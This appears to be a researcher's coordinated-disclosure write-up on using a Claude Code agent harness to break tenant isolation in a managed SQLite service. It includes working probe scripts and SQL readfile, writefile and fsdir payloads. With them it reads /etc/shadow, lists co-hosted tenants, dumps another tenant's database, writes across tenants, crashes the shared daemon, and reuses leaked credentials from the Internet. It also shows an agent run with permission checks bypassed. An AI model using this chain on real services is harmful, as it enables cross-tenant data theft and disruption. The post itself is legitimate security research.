How my hackbot walked out of a managed multi-tenant SQL pod

April 23, 2026 · Cloud · Multi-tenant isolation · Agentic security research

The vendor and product names in this post are intentionally redacted. The disclosed issues are still in remediation; this post is about the technique and the agentic loop that surfaced it, not the target. Treat every product name, hostname, and credential string below as a placeholder — they are real, they are just not the ones I tested against.

I keep a small Claude Code harness around for cloud audits. It is nothing exotic — a global CLAUDE.md with a playbook for authorization-bypass hunting, a few canonical policy templates, bypassPermissions mode for the boring confirmations, and a habit of pointing it at one service at a time. Most engagements are AWS. This one was not.

On a Thursday morning I dropped a single file into the working directory — the connection JSON the vendor hands you when you provision one of their managed SQLite databases — and asked the agent to connect to it. Five hours later I had three Critical reports drafted: cross-tenant raw-database disclosure, cross-tenant filesystem write plus a pod-wide denial of service, and a fleet-wide credential leak that authenticated from the public Internet against the vendor’s observability pipeline. The same SQL primitive sits at the bottom of all three.

This is the diary of the hunt — the prompts I gave, the loops the agent ran, the moments where the human had to step in and the ones where I just got out of the way.

0. The setup

The product is a managed multi-tenant SQLite plane reached over HTTP. You provision a database, you get a connection JSON with a URL and two JWTs — a read/write token and a read-only token. You point any compatible client at the SQL pipeline endpoint, send statements, get rows. From the customer’s perspective there is no console, no SSH, no shell — the JWT and the URL are the entire surface.

That is exactly the kind of surface a hackbot should be good at. There is no UI to misclick, no flaky XHR to chase: just one HTTP endpoint, one auth model, and a SQL parser that either runs your statement or rejects it. Everything is deterministic. Everything is transcribable. The agent can iterate as fast as curl can.

1. “What can this JWT actually do?”

Here’s a connection JSON for one of my accounts. Connect to it, then enumerate every SQL primitive an unprivileged customer session is allowed to call.

The first prompt is the only one that matters. If the agent knows what the goal is — map the surface, then push on every joint — it will spend the next hour grinding through SQL functions, pragma statements, virtual tables and extension hooks without further direction.

The agent built a tiny shell helper, probe.sh, that turned every prompt I’d give it after that into a one-line round trip:

#!/usr/bin/env bash
SECRETS="${SECRETS:-secrets.json}"
URL="$(jq -r .DATABASE_URL "$SECRETS" | sed 's|^.*://|https://|; s|/$||')<PIPELINE>"
TOK="$(jq -r .DATABASE_AUTH_TOKEN "$SECRETS")"
BODY=$(jq -cn --arg s "$1" '{requests:[{type:"execute",stmt:{sql:$s}},{type:"close"}]}')
curl -s -X POST "$URL" -H "Authorization: Bearer $TOK" \
  -H "Content-Type: application/json" --data-raw "$BODY"

Then it walked the SQLite surface in a loop — SELECT sqlite_version(), then PRAGMA function_list, then PRAGMA module_list. The version string came back as a recent SQLite. The server was a forked SQLite-over-HTTP daemon — standard build, version pinned to a recent release. So far, expected.

The function list was not.

$ ./probe.sh "SELECT name FROM pragma_function_list WHERE name IN
              ('readfile','writefile','load_extension','fsdir','sqlite_dbpage')"
{"results":[{"type":"ok","response":{"type":"execute","result":{
  "cols":[{"name":"name"}],
  "rows":[[{"type":"text","value":"readfile"}],
          [{"type":"text","value":"writefile"}],
          [{"type":"text","value":"fsdir"}]]}}}]}

Three names that should never appear on a customer-facing SQL VM. readfile() reads any path the process can open. writefile() writes any path the process can write. fsdir() is a virtual table that walks directory trees. They are the SQLite CLI’s convenience functions, normally only registered for interactive shell use. Here they were exposed to a JWT that any signup form would issue.

2. The first `readfile()`

The agent did not need any further nudge. It started reading.

$ ./probe.sh "SELECT readfile('/etc/hostname')"   # → <12-CHAR CONTAINER ID>
$ ./probe.sh "SELECT readfile('/etc/os-release')"  # → Debian GNU/Linux 11
$ ./probe.sh "SELECT readfile('/proc/self/status') | grep ^Uid"  # → Uid: 0 0 0 0
$ ./probe.sh "SELECT readfile('/etc/shadow')"      # → root:!:...

The container runs the database daemon as root, on Debian 11. /etc/shadow readable. /proc/self/maps readable. /proc/self/environ readable. The whole filesystem the process can see is on the table.

This is the moment most exploratory audits stop and write the report — “customer JWT can read arbitrary files inside the container” is already a finding. But the interesting question for a multi-tenant database product is not what can you read inside your own container. It is whose data lives in this container besides yours.

3. Two JWTs, same hostname

Here’s a second connection JSON from a different account I own. Same region. Compare the two — if your theory is right, prove they share a filesystem. If they don’t, rule it out.

I created a second database under a different account, downloaded its connection JSON, and dropped it next to the first. The agent ran the same one-liner against both:

$ ./probe.sh -s secrets-attacker.json "SELECT readfile('/etc/hostname')"
<12-CHAR CONTAINER ID>
$ ./probe.sh -s secrets-victim.json   "SELECT readfile('/etc/hostname')"
<12-CHAR CONTAINER ID>       # ← same one

Same 12-character container hostname. Two accounts, two JWTs, one filesystem. The plane co-locates many tenants per pod — the agent had landed both of mine on the same one. From here forward I had a confirmed cross-tenant primitive in hand; the rest of the day was about turning “you can read files” into “you can read their rows.”

4. `fsdir()` → the neighbour list

The agent walked fsdir() from / downward. The interesting tree was the data root:

$ ./probe.sh "SELECT name FROM fsdir('<DATA_ROOT>','.')
              WHERE name GLOB '<DATA_ROOT>/group_*/*/dbs/*'
              AND name NOT GLOB '<DATA_ROOT>/group_*/*/dbs/*/*' ORDER BY name"

The result was a list of every live customer database co-hosted on the pod, each one keyed by the customer’s chosen namespace. At the time of reporting it returned ten rows — including third-party brand names I will not repeat here, plus a couple of obvious staging environments. The directory layout was uniform:

<DATA_ROOT>/group_<ULID>/<UUID>/dbs/<NS>/{data, data-wal, data-shm, stats.json}

The <ULID> and <NS> for every tenant are public — they appear verbatim in the connection URL the platform hands out. Only the <UUID> is per-deployment, and it is enumerable with one extra fsdir() call. So given any victim’s public connection URL, the attacker can resolve the on-disk path of their data file in two queries.

5. The neighbour’s rows

Stop hand-waving on impact. Pick a victim namespace, derive its directory, exfiltrate the SQLite file, open it locally and show me a row.

To make the demonstration safe I used my own second account as the “victim” and seeded a realistic table:

$ ./probe.sh -s secrets-victim.json \
    "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT,
       password_hash TEXT, ssn_last4 TEXT, card_last4 TEXT)"
$ ./probe.sh -s secrets-victim.json \
    "INSERT INTO users(email,password_hash,ssn_last4,card_last4) VALUES
     ('alice@victim.example','<BCRYPT_A>','4312','1881'),
     ('bob@victim.example','<BCRYPT_B>','9087','2042')"

Then, from the attacker JWT, the agent resolved the victim’s on-disk path and dumped the database files:

$ for f in data data-wal; do
    ./probe.sh -s secrets-attacker.json \
      "SELECT readfile('$VICTIM_DIR/$f')" \
    | python3 -c "import sys,json,base64;
        r=json.load(sys.stdin)['results'][0]['response']['result']['rows'][0][0];
        sys.stdout.buffer.write(base64.urlsafe_b64decode(r['base64']+'=='))" > $f
  done
$ file data
data: SQLite 3.x database
$ sqlite3 data "SELECT email,password_hash,ssn_last4,card_last4 FROM users"
alice@victim.example|<BCRYPT_A>|4312|1881
bob@victim.example|<BCRYPT_B>|9087|2042

The two rows the “victim” tenant inserted thirty seconds earlier — bcrypt hashes, SSN-last-4, card-last-4 — came back to a JWT that had never been told the table existed. data-wal matters because uncheckpointed transactions live there; sqlite3 applies it automatically when you open the main file. Every neighbour on the pod is fully exfiltrable using the same recipe; this was Critical #1.

6. Flipping the primitive: `writefile()`

Now the other direction. Drop a file into the victim’s directory from the attacker JWT, prove the victim can see it. If you can reach RCE without touching another tenant’s paths, do it.

The agent built a second helper that uploads a base64 blob as a typed parameter and writes it via SELECT writefile(?, ?). From there the demonstration was a couple of round-trips:

$ MARKER="PWNED_BY_ATTACKER_$(uuidgen)_$(date -u +%s)"
$ ./probe.sh -s secrets-attacker.json \
    "SELECT writefile('$VICTIM_DIR/pwned.txt', '$MARKER')"
$ ./probe.sh -s secrets-victim.json "SELECT readfile('$VICTIM_DIR/pwned.txt')"
PWNED_BY_ATTACKER_<...>

Attacker JWT writes; victim JWT reads back the exact bytes. The cross-tenant write is real.

From there the agent flagged the obvious follow-on — writefile() runs as root, and the writable filesystem includes /etc/cron.d/, /etc/ld.so.preload, the container’s entrypoint script, and the daemon’s own binary. Each of those is a one-shot path to in-container code execution. Each of them is also shared with every tenant on the pod, so I held the line and did not exercise them. The vendor’s internal team can do that on a throwaway pod.

What I did exercise was the supervisor. Truncating the victim’s data-wal and data-shm to zero bytes from the attacker JWT crashes the database daemon — not just the victim’s namespace but the entire shared process — and every tenant on the pod gets 502 Bad Gateway for the ~45 seconds it takes the supervisor to restart. One writefile() call, one shared denial of service. This was Critical #2.

7. The container ships its own keys

While you have a free readfile(), look at what the daemon’s container itself ships. Anything baked into the image is fair game.

This is the prompt I should have given an hour earlier. The agent walked the daemon’s config directory and found two TOML files. Redacted skeleton:

[backup]
backupinterval = "1m"
[s3.<region-a>]
access   = "<S3_ACCESS_KEY>"
secret   = "<S3_SECRET>"
endpoint = "http://<INTERNAL_IP>:<PORT>"
metastore_bucket = "<METASTORE_BUCKET>"
data_bucket      = "<DATA_BUCKET>"
[s3.<region-b>]
access   = "<S3_ACCESS_KEY>"   # same key, both regions
...
[tls_client]
cert = """-----BEGIN CERTIFICATE-----
...<FLEET-WIDE CN>, <PLATFORM INTERMEDIATE CA>, valid 2024 → 2034...
-----END EC PRIVATE KEY-----"""

Three credential sets, all readable by any customer JWT:

S3 keypair for the backup and metastore buckets — the buckets that hold every tenant’s SQLite backup plus the metastore (namespace-to-DB mapping and tenant auth-token state). One key for both regions. Backup interval one minute.
Cluster mTLS client cert + EC private key, with a generic non-per-pod CN, signed by the platform’s intermediate CA, with server-side SANs pointing at internal raft / admin / rpc hostnames. A fleet-shared identity, valid for nine years.
HTTP Basic credentials, used by the daemon’s sidecar config to ship logs, metrics, and billing events to the platform’s observability ingest.

8. Verifying the ingest credentials from the public Internet

I have explicit approval to verify these three credentials — non-destructive only. For each: confirm whether it actually authenticates from the public Internet, and tell me what an attacker would unlock.

Credentials #2 and #3 turned out to be internal-only — the S3 endpoint is firewalled off the Internet, and the cluster admin / raft / rpc names do not resolve in public DNS. They are still material on a write-side foothold (the writefile() finding gives you exactly that), but they are not directly exploitable from outside.

The HTTP Basic + mTLS pair was different. The ingest hostname does resolve, the LE chain is valid, and the agent walked through the auth boundary cleanly with empty and deliberately-malformed POST bodies:

$ curl --cert <client.crt> --key <client.key> \
       -u "<USER>:<PASS>" -X POST \
       -H 'Content-Length: 0' \
       https://<INGEST_HOST>:<PORT>/billing-events
HTTP/2 200

$ curl --cert <client.crt> --key <client.key> \
       -u "<USER>:WRONG" -X POST -H 'Content-Length: 0' \
       https://<INGEST_HOST>:<PORT>/billing-events
HTTP/2 401

The 200 on a correct empty body and the 401 on a wrong password are exactly what you want from an auth-verification probe — the parser only runs after auth succeeds. The deliberately-malformed body returns HTTP 400 with a framing error, confirming a well-formed payload would be ingested. From any Internet host with the leaked client cert + Basic credentials, an attacker can:

Forge log entries claiming any source / host / pod — impersonating any production daemon, drowning real alerts, polluting audit trails on the way to the vendor’s downstream observability tenant.
Push arbitrary Prometheus samples on the metrics port, including “healthy” values for SLO metrics that would otherwise page someone.
Submit forged billing events to the billing ingest — the most uncomfortable of the three, because depending on the event schema this is a path to overcharging arbitrary customers, undercharging an attacker, or producing accounting chaos.

This was Critical #3.

What the harness actually did

I am not pretending the agent did this on its own. There were six or seven control points where the human had to nudge: provisioning the second account so the cross-tenant theory could be falsified, deciding to stop short of cron-based RCE in a shared container, choosing which of the three credentials to verify against live infra and which to leave on paper, and writing the actual reports against the program’s submission template.

What the harness did do, and did very fast, was the part that usually takes me a day:

Surface enumeration. Going from “here is a JWT” to “readfile(), writefile(), and fsdir() are exposed” is one prompt and three round-trips. I never had to read a line of the daemon’s source.
Helper scripting. The two probe scripts are the kind of tooling I would have hand-written in a notebook over forty minutes. The agent wrote both in two.
Path arithmetic. Going from a public connection URL to a victim’s on-disk directory is mechanical — parse the URL, do one fsdir(), format the result. Mechanical work is exactly what an LLM agent does without complaining.
Report drafting. Once the primitives are confirmed, the agent can produce a program-formatted writeup with reproducible steps in roughly the time it takes to sanity-check it. I rewrote about a third of each report by hand — mostly impact framing — but the skeletons were the agent’s.

The trick is that none of the prompts in this post are clever. They are not jailbreaks, they are not chain-of-thought scaffolds, they are not multi-agent orchestrations. They are the same six or seven sentences any senior pentester would mutter to themselves while looking at an unfamiliar SQL JWT for the first time. The harness just turns muttering into 14 round-trips per minute.

Takeaway for anyone running a managed SQLite plane

Audit the function list of your customer-facing SQL VM. readfile, writefile, fsdir, load_extension and sqlite_dbpage are SQLite CLI conveniences and infrastructure helpers. They have no business on a JWT-served pipeline. While you are at it: don’t run the daemon as root inside the container, don’t bake live credentials into the image, and assume that any string a customer JWT can SELECT readfile() is, for all practical purposes, public.

This was reported through the vendor’s coordinated-disclosure program on the day the primitives were confirmed. Both test databases were owned by me; no third-party tenant data was read, written, or corrupted. Specifics — product names, hostnames, credential strings, version pins — will be added to a follow-up post once the issues are remediated and the disclosure timeline allows.